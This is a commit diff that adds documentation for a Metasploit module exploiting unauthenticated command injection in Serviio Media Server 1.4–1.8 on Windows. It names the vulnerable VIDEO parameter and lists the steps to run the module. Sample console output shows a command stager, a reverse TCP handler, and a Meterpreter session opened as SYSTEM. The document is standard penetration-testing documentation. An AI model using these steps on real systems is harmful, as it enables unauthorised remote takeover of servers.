Add documentation

Author: bcoles

documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md

@@ -0,0 +1,71 @@
+## Description
+
+  This module exploits an unauthenticated remote command execution vulnerability in the console component of [Serviio Media Server](http://serviio.org/) versions 1.4 to 1.8 on Windows operating systems.
+
+  The console service (on port 23423 by default) exposes a REST API which which does not require authentication.
+
+  The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands.
+
+## Vulnerable Application
+
+  Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.
+
+  Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).
+
+  This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.
+
+  Installers:
+
+  * [serviio-1.8-win-setup.exe](http://download.serviio.org/releases/serviio-1.8-win-setup.exe)
+  * [serviio-1.7-win-setup.exe](http://download.serviio.org/releases/serviio-1.7-win-setup.exe)
+  * [serviio-1.6-win-setup.exe](http://download.serviio.org/releases/serviio-1.6-win-setup.exe)
+  * [serviio-1.5-win-setup.exe](http://download.serviio.org/releases/serviio-1.5-win-setup.exe)
+  * [serviio-1.4-win-setup.exe](http://download.serviio.org/releases/serviio-1.4-win-setup.exe)
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/windows/http/serviio_checkstreamurl_cmd_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. You should get a session
+
+## Sample Output
+
+  ```
+  msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
+  msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
+  rhost => 172.16.191.166
+  msf exploit(serviio_checkstreamurl_cmd_exec) > check
+  [*] 172.16.191.166:23423 The target appears to be vulnerable.
+  msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
+  verbose => true
+  msf exploit(serviio_checkstreamurl_cmd_exec) > check
+
+  [*] 172.16.191.166:23423 Serviio Media Server version 1.8
+  [*] 172.16.191.166:23423 The target appears to be vulnerable.
+  msf exploit(serviio_checkstreamurl_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [*] Serviio Media Server version 1.8
+  [*] Command Stager progress -   7.95% done (7999/100636 bytes)
+  [*] Command Stager progress -  15.90% done (15998/100636 bytes)
+  [*] Command Stager progress -  23.85% done (23997/100636 bytes)
+  [*] Command Stager progress -  31.79% done (31996/100636 bytes)
+  [*] Command Stager progress -  39.74% done (39995/100636 bytes)
+  [*] Command Stager progress -  47.69% done (47994/100636 bytes)
+  [*] Command Stager progress -  55.64% done (55993/100636 bytes)
+  [*] Command Stager progress -  63.59% done (63992/100636 bytes)
+  [*] Command Stager progress -  71.54% done (71991/100636 bytes)
+  [*] Command Stager progress -  79.48% done (79990/100636 bytes)
+  [*] Command Stager progress -  87.43% done (87989/100636 bytes)
+  [*] Command Stager progress -  95.38% done (95988/100636 bytes)
+  [*] Sending stage (957487 bytes) to 172.16.191.166
+  [*] Command Stager progress - 100.00% done (100636/100636 bytes)
+  [*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > pwd 
+  C:\Program Files\Serviio\bin
+  ```